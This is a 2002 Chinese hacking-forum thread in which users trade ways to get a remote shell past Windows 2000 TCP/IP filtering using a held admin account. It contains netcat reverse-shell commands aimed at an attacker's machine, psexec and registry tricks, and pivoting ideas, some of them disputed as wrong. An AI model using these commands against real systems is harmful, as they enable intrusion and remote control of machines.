|
作者: group [group] 论坛用户 | 登录 |
作者 主题: 挑战你自己的水平(自认为高手的进来看看) ( 页: 1 2 3 ) Meteor 中级站友 威望:0 发表于 2002-03-01.20:06:44 -------------------------------------------------------------------------------- 1.如果你还不知道什么是tcp/ip filtering(tcp/ip过滤)的话,那你不用往下看了 2.如果只是会上载木马上去,没有其它技俩的话,亦不用看下去了 3.如果你认为自己是高手,会解决到这样的问题,就往下看 一台win 2k系统,没什么特别,只是使用了tcp/ip filtering(tcp/ip过滤),udp端口全部 过滤掉,tcp端口只是允许135和139,其它端口一律过滤。假设你有这台系统的一个admin 帐号,硬盘有共享,你可以复制文件上去,可以远程执行。问题是要你使用你所知道的方法 ,去得到远程的shell(即是你可以telnet进去那台系统中去,得到一个shell),方法不限, 但最终结果是要得到远程的Shell. -------------------------------------------------------------------------------- 总发帖数: 51 | 来源: CyberSpace | 注册日期: 2001-12-14 IP: 已记录 刺 长 老 级 威望:0 发表于 2002-03-01.20:07:46 -------------------------------------------------------------------------------- nc建立反向通道―――――――――― -------------------------------------------------------------------------------- 总发帖数: 666 | 来源: netXeyes | 注册日期: 2002-01-19 IP: 已记录 刺 长 老 级 威望:0 发表于 2002-03-01.20:09:26 -------------------------------------------------------------------------------- ntcmd走的是139端口―――――――――― -------------------------------------------------------------------------------- 总发帖数: 666 | 来源: netXeyes | 注册日期: 2002-01-19 IP: 已记录 Meteor 中级站友 威望:0 发表于 2002-03-01.20:12:58 -------------------------------------------------------------------------------- 139 is already opened,and ntcmd sends commands to the remotenc system to be executed,but it doesn‘t spawn a remote shell. -------------------------------------------------------------------------------- 总发帖数: 51 | 来源: CyberSpace | 注册日期: 2001-12-14 IP: 已记录 刺 长 老 级 威望:0 发表于 2002-03-01.20:14:46 -------------------------------------------------------------------------------- 想来想去还是nc建立反向通道划算 不知道计算机管理的连接是走哪个端口?不然问题也好办些~~~~―――――――――― -------------------------------------------------------------------------------- 总发帖数: 666 | 来源: netXeyes | 注册日期: 2002-01-19 IP: 已记录 netcrows 一般站友 威望:0 发表于 2002-03-01.20:16:49 -------------------------------------------------------------------------------- 你的意思是不是通过这台机器进入内网?―――――――――― netcrows -------------------------------------------------------------------------------- 总发帖数: 30 | 来源: Sky... | 注册日期: 2002-01-19 IP: 已记录 刺 长 老 级 威望:0 发表于 2002-03-01.20:18:29 -------------------------------------------------------------------------------- 原文由 netcrows 发表: 你的意思是不是通过这台机器进入内网? 不是,他的意思是就算你有admin权限,但没有shell也没用 这个问题我前段时间好好想过,本来还准备写文章的,后来由于感情纠葛就放下了 ―――――――――― -------------------------------------------------------------------------------- 总发帖数: 666 | 来源: netXeyes | 注册日期: 2002-01-19 IP: 已记录 Meteor 中级站友 威望:0 发表于 2002-03-01.20:19:42 -------------------------------------------------------------------------------- netcat can spawn remote shell,but keep in mind that only two ports(135 and 139) are permited by tcp/ip filtering.You can bind a port like 2222 or some other ports,but you can‘t telnet in because the system doesn‘t allow 2222 to communicate to outside. -------------------------------------------------------------------------------- 总发帖数: 51 | 来源: CyberSpace | 注册日期: 2001-12-14 IP: 已记录 netcrows 一般站友 威望:0 发表于 2002-03-01.20:35:45 -------------------------------------------------------------------------------- 请你看看下面的方法行不行 1、你要有同一个局域网的另一台机器的admin shell,一般作了tcp/ip过滤的都是代理服务器,但是应该还有其他可以和外界通讯的机器的,如web server、mail server..... 2、把你得到的机器做成socks代理服务器,现在你已经可以和目标机器可以通讯 3、通过你刚才得到的跳板和目标机器建立ipc$连接 4、通过刚才做好的socks代理用注册表修改目标机器的如下键值 HKEY_local_machine---software---microsoft---telnetserver---1.0把里面的NTLM由2改为0 5、通过跳板telnet目标机 ―――――――――― netcrows -------------------------------------------------------------------------------- 总发帖数: 30 | 来源: Sky... | 注册日期: 2002-01-19 IP: 已记录 刺 长 老 级 威望:0 发表于 2002-03-01.20:39:28 -------------------------------------------------------------------------------- tlntadmn.exe把telnet端口设为135或139―――――――――― -------------------------------------------------------------------------------- 总发帖数: 666 | 来源: netXeyes | 注册日期: 2002-01-19 IP: 已记录 Meteor 中级站友 威望:0 发表于 2002-03-01.20:55:52 -------------------------------------------------------------------------------- no,if telnet service tries to bind port to 135 or 139,it will fails to start because telnet has no priority to bind its port to 135 or 139 if 135 and 139 are already opened. -------------------------------------------------------------------------------- 总发帖数: 51 | 来源: CyberSpace | 注册日期: 2001-12-14 IP: 已记录 ljspace 新手上路 威望:0 发表于 2002-03-01.20:58:14 -------------------------------------------------------------------------------- 去wawa那看看 我想你会找到答案的 -------------------------------------------------------------------------------- 总发帖数: 2 | 来源: 其它 | 注册日期: 2002-03-01 IP: 已记录 刺 长 老 级 威望:0 发表于 2002-03-01.21:01:29 -------------------------------------------------------------------------------- 原文由 ljspace 发表: 去wawa那看看 我想你会找到答案的 说清楚点 ―――――――――― -------------------------------------------------------------------------------- 总发帖数: 666 | 来源: netXeyes | 注册日期: 2002-01-19 IP: 已记录 刺 长 老 级 威望:0 发表于 2002-03-01.21:03:11 -------------------------------------------------------------------------------- dwrcc走139端口? 上去任意蹂躏它~~~―――――――――― -------------------------------------------------------------------------------- 总发帖数: 666 | 来源: netXeyes | 注册日期: 2002-01-19 IP: 已记录 我最老实 高级站友 威望:1 发表于 2002-03-01.21:03:25 -------------------------------------------------------------------------------- follow me nc.exe ip 139|cmd.exe|nc.exe ip 135 -------------------------------------------------------------------------------- 总发帖数: 129 | 来源: netXeyes | 注册日期: 2002-02-10 IP: 已记录 刺 长 老 级 威望:0 发表于 2002-03-01.21:04:24 -------------------------------------------------------------------------------- 原文由 刺 发表: dwrcc走139端口? 上去任意蹂躏它~~~ sorry,着不行 Meteor 中级站友 威望:0 发表于 2002-03-01.21:08:39 -------------------------------------------------------------------------------- try you method before you answer this question.A incorrect method does nothing good but misleading the others. By now,all answers are not sufficient to solve this quesion. -------------------------------------------------------------------------------- 总发帖数: 51 | 来源: CyberSpace | 注册日期: 2001-12-14 IP: 已记录 刺 长 老 级 威望:0 发表于 2002-03-01.21:25:33 -------------------------------------------------------------------------------- 还有谁知道?―――――――――― -------------------------------------------------------------------------------- 总发帖数: 666 | 来源: netXeyes | 注册日期: 2002-01-19 IP: 已记录 刺 长 老 级 威望:0 发表于 2002-03-01.21:35:10 -------------------------------------------------------------------------------- 如何用nc建立反向通道 ( 2002/01/22) 在Hacking Exposed上讲了两个办法。经过试验是可行的。 方法一: 使用nc创建一个从目标机器到攻击者自己的机器的反向通道。因为从目标机器发起连接,通常防火墙不会阻挡。 攻击者机器:开两个窗口(or 两个终端)机器类型不限 nc -l -n -v -p 80 (该窗口用来输入命令) nc -l -n -v -p 25 (该窗口用来得到输出) 目标机器: 通过cgi的毛病或者IIS的毛病来运行该指令 nc 攻击者机器 80 | /bin/sh | nc 攻击者机器 25 nc 攻击者机器 80 | c:\winnt\system32\cmd.exe | nc 攻击者机器 25 (对于windows NT作为目标的情况) 这个时候从nc监听80的那个窗口输入命令,就可以从监听25那个窗口看到结果了。 没解决的问题: Hacking Exposed上说是完全可以用telnet来运行的。也就是上面在目标机器执行的nc都是可以用telnet来取代,它是假设目标机器没有nc这个工具的。实际上我研究不出来。不灵,只能连接一下,马上就断了。 方法二: 目标机器有nc的情况,不过这个nc要有-e参数。windows下的nc.exe默认就是有-e参数。而UNIX下的默认是没有的。具体原因是要在netcat.c里打开一个已经#define GAPING_SECURITY_HOLE选项。不过什么原因我不懂,就直接把sinbad改好的netcat.c发过来好了。 攻击者机器: nc -l -n -v -p 80 目标机器: nc -e /bin/sh 攻击者机器 80 (这个时候该窗口将得到交互式的SHELL) nc -e c:\winnt\system32\cmd.exe 攻击者机器 80 ok了 ―――――――――― -------------------------------------------------------------------------------- 总发帖数: 666 | 来源: netXeyes | 注册日期: 2002-01-19 IP: 已记录 merry 一般站友 威望:0 发表于 2002-03-01.21:37:19 -------------------------------------------------------------------------------- It seems only you know how to manage it, is it? Question: 1. Must the so-called "shell" be a telnet shell? 2. If not, according to your condition, can an opened window addressed to "\\Server\NETLOGON" satisfy your requirement? Cuz a window is a shell as well. 3. I have the administrative privilege to \\Server, I can logon to the machine thought standard windows logon process, right? Then, use "Server manager" or "Computer Management" tool can remotely control this machine. We can open its service list and strat/stop services we want. For example the IPSec service and the telnet service. I cannot establish an environment like what u described, because u did not state it clearly. But one point is clear that I’m not answering your question but just raised my questions. Regards, -------------------------------------------------------------------------------- 总发帖数: 17 | 来源: netXeyes | 注册日期: 2001-07-13 IP: 已记录 merry 一般站友 威望:0 发表于 2002-03-01.21:48:48 -------------------------------------------------------------------------------- 原文由 刺 发表: 如何用nc建立反向通道 ( 2002/01/22) 在Hacking Exposed上讲了两个办法。经过试验是可行的。 方法一: 使用nc创建一个从目标机器到攻击者自己的机器的反向通道。因为从目标机器发起连接,通常防火墙不会?..... 两个方法的共同错误: 目标机器更本没有开放80端口,根本没有反应。 方法一特有的错误: 为什么要假设目标机器的iis和cgi有漏洞呢?如果没有呢? 更难的问题: 如果有iis和cgi漏洞,作为有良知的电脑爱好者,如何为他补漏呢? -------------------------------------------------------------------------------- 总发帖数: 17 | 来源: netXeyes | 注册日期: 2001-07-13 IP: 已记录 reducm 老 站 友 威望:0 发表于 2002-03-01.21:49:59 -------------------------------------------------------------------------------- 呵呵,开3389好玩D―――――――――― -------------------------------------------------------------------------------- 总发帖数: 239 | 来源: 广东 | 注册日期: 2002-02-15 IP: 已记录 刺 长 老 级 威望:0 发表于 2002-03-01.21:52:21 -------------------------------------------------------------------------------- 原文由 merry 发表: 两个方法的共同错误: 目标机器更本没有开放80端口,根本没有反应。 方法一特有的错误: 为什么要假设目标机器的iis和cgi有漏洞呢?如果没有呢? 更难的问题: 如果有iis和cgi漏洞,作为有良知的电脑爱好者,如?..... i faint~~~这篇文章好象是coolweis写的,我只是原封不动转过来而已,想必你没看过。 我在这里说的是他的思路,没80不是有135和139吗? 没iis和cgi不是有ntcmd吗? i faint~~~sorry,话说直了点~~ ―――――――――― -------------------------------------------------------------------------------- 总发帖数: 666 | 来源: netXeyes | 注册日期: 2002-01-19 IP: 已记录 merry 一般站友 威望:0 发表于 2002-03-01.21:59:18 -------------------------------------------------------------------------------- 原文由 刺 发表: i faint~~~sorry,话说直了点~~ I smile. And I like u. -------------------------------------------------------------------------------- 总发帖数: 17 | 来源: netXeyes | 注册日期: 2001-07-13 IP: 已记录 Meteor 中级站友 威望:0 发表于 2002-03-01.22:02:09 -------------------------------------------------------------------------------- For the methods on hacking exposed,I have just tested it,it won‘t work because port 80 is completed filtered,you may think port 80 is blocked. The shell I mentioned is to spawn a cmd.exe process and then you can telnet in.You can execute commands on that system using the administrative privilege,but you can‘t complete take control of it since you can only use the ipc to send commands to the remote system and execute it.If you think the quesion is not clear,you can understand the quesion like this:I want you to establish an environment to communicate with the remote system using your own way(telnet into,by trojan or other methods whatever you want) rather than using ipc provided above,or you may think of that is a quesion asking you to bypass the tcp/ip filtering. [ 此消息由 Meteor 在 2002-03-01.22:04:19 编辑过 ] -------------------------------------------------------------------------------- 总发帖数: 51 | 来源: CyberSpace | 注册日期: 2001-12-14 IP: 已记录 cooldidi 中级站友 威望:0 发表于 2002-03-01.22:12:27 -------------------------------------------------------------------------------- 可否用端口转接来做个SHELL? ICMD和好多后门软件都可以设定端口,有些是不可以重叠的,但是好象有几个可以重叠使用~试试看能不能把他定在135上面~~~~ 反正拿到远程SHELL就行了~~~~ 不行的话也可以试试小榕的方法:在4。6上用的那招,装个4。6上去,端口定在135和139,然后远程登陆用联结的方法拿他的远程SHELL~~~~ 我不是很明白,如果我的方法不对就当我没说过~~~~~ 耽误大家时间实在不好意思~~~~~~~~ -------------------------------------------------------------------------------- 总发帖数: 52 | 来源: 江苏 | 注册日期: 2002-02-06 IP: 已记录 Meteor 中级站友 威望:0 发表于 2002-03-01.22:24:16 -------------------------------------------------------------------------------- you can try on your own system to spawn a shell on the already-opened port like 139 using netcat,and see what happen. There are something about binding port: for most programs, to bind a specified port,the program will first detect whether the port it want to bind is in use or not,if the port is already open,it program will teminate itself or returen some error message or bind to another port in most cases. -------------------------------------------------------------------------------- 总发帖数: 51 | 来源: CyberSpace | 注册日期: 2001-12-14 IP: 已记录 omygod 中级站友 威望:0 发表于 2002-03-01.22:24:28 -------------------------------------------------------------------------------- tcp/ip过滤以后,不知道是修改的那个文件或者是注册表? 把它改掉不行吗?(随便问问,不要笑)―――――――――― 人类一思考,上帝就发笑 -------------------------------------------------------------------------------- 总发帖数: 44 | 来源: 河北 | 注册日期: 2002-02-22 IP: 已记录 Meteor 中级站友 威望:0 发表于 2002-03-01.22:28:33 -------------------------------------------------------------------------------- Time for school,I wish there would be a better method for this question after I back home.Understanding how to bypass tcp/ip filtering,you can apply the same method to some other situations such as bypassing firewall or router. -------------------------------------------------------------------------------- 总发帖数: 51 | 来源: CyberSpace | 注册日期: 2001-12-14 IP: 已记录 cooldidi 中级站友 威望:0 发表于 2002-03-01.22:45:05 -------------------------------------------------------------------------------- 他是用什么屏蔽掉端口的??? 能不能用其他软件杀了他啊? 也许刺的方法有用~~可以用反通道的方法~~ 他不会把自己出去的路都堵住吧~ 不过我有了另外一个想法,既然能共享,那么我可以建BAT文件,我用远程执行的方法,不用SHELL也照样执行远程SHELL能执行的命令,不过这样的话就没有显示了~~~不过如果你只想运行命令的话可以用这个~~~~~ 不知道你认为怎么样~~~~ -------------------------------------------------------------------------------- 总发帖数: 52 | 来源: 江苏 | 注册日期: 2002-02-06 IP: 已记录 午饭 一般站友 威望:0 发表于 2002-03-01.22:52:22 -------------------------------------------------------------------------------- IP Filtering has a fault, If it is an ICMP packet, Ip filtering will let it go on! Because u have administrator privilege, it‘s enough! we will use a ICMP SHELL. Don‘t tell me u don‘t know this!!! hehe! en,en! by the way, u also can upload a script to change the key HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\enablesecurityfilter (0 is off|1 is on) and manual is also good! we should remember u are a administrator, u can do the things u want, but if u change this key, u should force the remote machine reboot!!! so maybe it is not a good idea. The other method, IP filtering does not filter ports destined for remote segments.If Internet Protocol (IP) Forwarding is enabled, the TCP/IP packets are forwarded as needed. so we can jump and jump.......... Meteor 中级站友 威望:0 发表于 2002-03-01.23:06:45 -------------------------------------------------------------------------------- I only heard icmp shell on linux,freebsd or unix. I have never heard it on windows. there is utilitites using icmp,but the downside is that it‘s pretty slow and I have not seen any real trojan or backdoor under windows using icmp.Or if you can program your own,then it‘s a good idea to fuck up this kind of situation,but back to reality,you method I have no time to test it out,or if you already test it,let me know the result since the theorm may be perfect,the result may be unexpected. -------------------------------------------------------------------------------- 总发帖数: 51 | 来源: CyberSpace | 注册日期: 2001-12-14 IP: 已记录 午饭 一般站友 威望:0 发表于 2002-03-01.23:35:06 -------------------------------------------------------------------------------- sooner u will see this code, hehe! the concept just like this. u should use a sniffer like Sniffer to get the icmp packet! then use the size of the packet to open a bindshell. create a socket, if a connect in, we can create two pipes, one for input, one for output. u could bind a cmd.exe read and write. -------------------------------------------------------------------------------- 总发帖数: 19 | 来源: 其它 | 注册日期: 2002-01-25 IP: 已记录 cooldidi 中级站友 威望:0 发表于 2002-03-01.23:47:10 -------------------------------------------------------------------------------- 午饭,能加我的QQ么?? 我想请教你一些问题~~~ 81326951 -------------------------------------------------------------------------------- 总发帖数: 52 | 来源: 江苏 | 注册日期: 2002-02-06 IP: 已记录 merry 一般站友 威望:0 发表于 2002-03-02.00:13:28 -------------------------------------------------------------------------------- 原文由 Meteor 发表: theorm may be perfect, the result may be unexpected. I cannot bypass IP filtering on a w2k system by any means I know. Once I set it up, the system becomes as hard as a rock. I realized one truth: Microsoft‘s products are generally nice and secure once you correctly set it up. That‘s why microsoft.com can hardly be cracked but other small sites running MS products can be easily hacked. Theory from Microsoft is perfect, and they really put it into live practice. I won‘t try any stupid crack tests any more; it can only make me feel like an idiot. -------------------------------------------------------------------------------- 总发帖数: 17 | 来源: netXeyes | 注册日期: 2001-07-13 IP: 已记录 菜鸟一个 老 站 友 威望:0 发表于 2002-03-02.03:14:28 -------------------------------------------------------------------------------- 原文由 刺 发表: 如何用nc建立反向通道 ( 2002/01/22) 在Hacking Exposed上讲了两个办法。经过试验是可行的。 方法一: 使用nc创建一个从目标机器到攻击者自己的机器的反向通道。因为从目标机器发起连接,通常防火墙不会?..... 办法和tftp的原理差不多,是由被攻击机来连接攻击机,防火墙是不会阻拦的~ ―――――――――― 我既要赢了你,也要赢了世界!^_^ -------------------------------------------------------------------------------- 总发帖数: 204 | 来源: 玉米之香 | 注册日期: 2002-01-22 IP: 已记录 菜鸟一个 老 站 友 威望:0 发表于 2002-03-02.03:17:33 -------------------------------------------------------------------------------- 如果为目标机器安装tftp呢??前提是顶楼说的可以复制文件并执行~**** 转: 近日在论坛总是看到有人问怎么启动Win2K下的TFTP服务,其实在默认情况下TFTP服务是没有安装的,只有在使用RIS服务的时候才会安装该服务(国内很少有人用这个玩艺,可能我是井底之蛙吧),现在我给大家示范如何来安装一个tftp服务(如果你有需要的话,阁下是网管还是XX呢?) 我们首先找到系统中的tftpd.exe文件,一般我们可以在%systemroot%\system32\dllcache目录下找到该文件,建议把该文件copy到其他目录。 C:\>copy %systemroot%\system32\dllcache\tftpd.exe %systemroot%\system32 已复制 1 个文件。 我们会用Windows 2000下的Resource Kits中的一个工具instsrv创建一个服务,instsrv的用法如下,当然,你也可以用其他的工具来实现(如srvinstw,GUI方式的)。 C:\>instsrv Installs and removes system services from NT INSTSRV <service name> (<exe location> | REMOVE) [-a <Account Name>] [-p <Account Password>] Install service example: INSTSRV MyService C:\MyDir\DiskService.Exe -OR- INSTSRV MyService C:\mailsrv\mailsrv.exe -a MYDOMAIN\joebob -p foo Remove service example: INSTSRV MyService REMOVE [俺的特色:字不够,帮助凑!] 添加一个服务,注意,该服务创建侯为自动启动。 C:\>instsrv tftp c:\winnt\system32\tftpd.exe The service was successfuly added! Make sure that you go into the Control Panel and use the Services applet to change the Account Name and Password that this newly installed service will use for its Security Context. 启动服务 C:\>net start tftp tftp 服务正在启动 . tftp 服务已经启动成功。 测试服务是否正常工作 C:\>tftp -i 61.135.21.195 PUT sometips.gif sometips.gif Transfer successful: 4209 bytes in 1 second, 4209 bytes/s C:\>dir tftpdroot 驱动器 C 中的卷是 C 卷的序列号是 1E23-1907 C:\tftpdroot 的目录 2001-09-22 01:14 <DIR> . 2001-09-22 01:14 <DIR> .. 2001-09-22 01:14 4,209 sometips.gif 1 个文件 4,209 字节 2 个目录 94,113,792 可用字节 注意,如果你上传文件,系统会在%systemdrive%自动创建一个名为tftproot的目录,OK,所有的工作已经完成了! Enjoy it! 注:俺在网上没有找到任何相关的资料,我猜想tftpd应该还有一些参数,比如指定tftproot目录等等,我按unix下的in.tftpd的参数测试了一下,没有成功,大家有兴趣就自己测试一下吧! 文章出处:中联绿盟 文章作者:Adam [ 此消息由 菜鸟一个 在 2002-03-02.03:18:27 编辑过 ]―――――――――― 我既要赢了你,也要赢了世界!^_^ -------------------------------------------------------------------------------- 总发帖数: 204 | 来源: 玉米之香 | 注册日期: 2002-01-22 IP: 已记录 Meteor 中级站友 威望:0 发表于 2002-03-02.08:09:19 -------------------------------------------------------------------------------- icmp protocal has its limitation,and I wonder whether it is able to handle operations as well as tcp/udp or not,but it‘s slow for sure.By the way,I figured out something interesting today that those so-call "high-hands" who post a lot in this forum don‘t seem able to answer this question,or providing misleading or out-of-topic answers.I still get no time to test your methods ,but to bypass tcp/ip filtering,disable tcp/ip filtering doesn‘t seem good becaue it doesn‘t really "bypass" it but kill it instead.A better way to bypass it is to program a little utility bind itself in front of these tcp/ip-filtering-allowed ports. -------------------------------------------------------------------------------- 总发帖数: 51 | 来源: CyberSpace | 注册日期: 2001-12-14 IP: 已记录 午饭 一般站友 威望:0 发表于 2002-03-02.10:33:38 -------------------------------------------------------------------------------- ya! so i say that wasn‘t a good idea. ICMP with too much limitation and truely slow, but sometimes it‘s useful. and i want to say, TCP/IP Filtering is not a good choice, u should use IPSEC, it‘s more safer and better than the first one. sometimes u could telnet 139 and use some commands for information, but it‘s not enough for controling a computer? Actually the port 139 can use for operation, i know some virus already use it for distributing guessword, but too bad, i have forgetten that, hehe! -------------------------------------------------------------------------------- 总发帖数: 19 | 来源: 其它 | 注册日期: 2002-01-25 IP: 已记录 楚楚留香 高级站友 威望:1 发表于 2002-03-02.11:14:24 -------------------------------------------------------------------------------- TCP/IP Filtering is not a good choice, u should use IPSEC, it‘s more safer and better than the first one. Good,i agree that,IPSEC is more safer than TCP/IP Filtering。hehe!―――――――――― 佛曰:我不入地狱谁入地狱。 我说:要去你就去干我屁事? -------------------------------------------------------------------------------- 总发帖数: 179 | 来源: netXeyes | 注册日期: 2001-04-17 IP: 已记录 刺 长 老 级 威望:0 发表于 2002-03-02.11:15:25 -------------------------------------------------------------------------------- 原文由 楚楚留香 发表: TCP/IP Filtering is not a good choice, u should use IPSEC, it‘s more safer and better than the first one. Good,i agree that,IPSEC is more safer than TCP/IP Filtering。hehe! 你的签名好别致啊~~~ ―――――――――― -------------------------------------------------------------------------------- 总发帖数: 666 | 来源: netXeyes | 注册日期: 2002-01-19 IP: 已记录 czh 中级站友 威望:0 发表于 2002-03-02.13:42:00 -------------------------------------------------------------------------------- psexec.exe,这个工具很不错,可以用IPC建立一个SHELL 而且不用另开端口, PSEXEC \\IP -U "ADMIN" -P "PASS" C:\WINNT\SYSTEM32\CMD.EXE 这样就可以绑定CMD,就有了一个SHELL,速度不错!―――――――――― czh -------------------------------------------------------------------------------- 总发帖数: 65 | 来源: 山西 | 注册日期: 2002-01-21 IP: 已记录 |
地主 发表时间: 03/17 01:03 |
回复: group [group] 论坛用户 | 登录 |
回复得太多,把新的也摆到后面了,再回一个放到上面来 |
B1层 发表时间: 03/17 01:08 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号